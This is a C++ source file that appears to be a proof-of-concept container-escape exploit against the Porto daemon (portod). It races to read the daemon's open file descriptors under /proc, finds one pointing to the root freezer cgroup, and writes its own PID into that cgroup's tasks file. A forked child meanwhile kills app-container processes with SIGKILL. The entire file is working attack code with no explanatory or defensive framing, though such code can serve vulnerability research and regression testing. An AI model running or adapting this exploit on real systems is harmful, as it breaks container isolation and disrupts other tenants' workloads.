#include <cerrno>
#include <sys/wait.h>

#include <util/stream/output.h>
#include <util/stream/file.h>
#include <util/system/fs.h>
#include <util/folder/filelist.h>
#include <util/datetime/base.h>
#include <util/folder/iterator.h>
#include <util/folder/path.h>


int attack(int selfPid, int targetPid) {
    auto semaphore_path = TString("/proc/") + ToString(targetPid) + "/fd";
    int fd;
    for (;;) {
        fd = open(semaphore_path.c_str(), O_RDONLY);
        if (fd != -1) {
            close(fd);
            break;
        }
    }

    TString freezerPath;
    Cout << "Available fds: ";
    TDirIterator fdDir("/proc/" + ToString(targetPid) + "/fd");
    for (auto &&file : fdDir) {
        if (file.fts_pathlen == file.fts_namelen) {
            continue;
        }

        TString fdPath = file.fts_path;
        if (fdPath.empty()) {
            continue;
        }

        try {
            if (file.fts_info == FTS_SL) {
                auto realPath = NFs::ReadLink(fdPath);
                Cout << fdPath << " -> " << realPath << Endl;
                if (realPath == "/sys/fs/cgroup/freezer") {
                    freezerPath = fdPath;
                    break;
                }
            }
        } catch (...) {
            //sorry
        }
    }

    if (!freezerPath) {
        Cout << "Failed to find freezer cgroup fd" << Endl;
        return 1;
    }

    Cout << "Found freezer cgroup fd: " << freezerPath << Endl;
    TFileOutput out(freezerPath + "/tasks");
    out.Write(ToString(selfPid));

    Cout << "Moved " << selfPid << " into root freezer cgroup" << Endl;
    return 0;
}

int main() {
    int selfPid = getppid();
    int targetPid = getpid() + 2;
    Cout << "Wait for portod with pid " << targetPid << Endl;

    int pid = fork();
    if (pid > 0) {
        attack(selfPid, targetPid);
        _exit(0);
    } else {
        sleep(1);

        TFsPath basePath("/proc");
        TDirsList procIterator;
        procIterator.Fill(basePath);

        while (auto pidID = procIterator.Next()) {
            try {
                TFileInput cmdline(basePath/pidID/"cmdline");
                if (cmdline.ReadAll().Contains("iss_hook_start/app")) {
                    Cout << "Found app container with pid: " << pidID << Endl;
                    if (kill(FromString<int>(pidID), SIGKILL)) {
                        Cerr << "kill failed:" << strerror(errno) << Endl;
                    }
                }
            } catch (...) {
                // sorry
            }
        }
    }

    waitpid(pid, nullptr, 0);
}
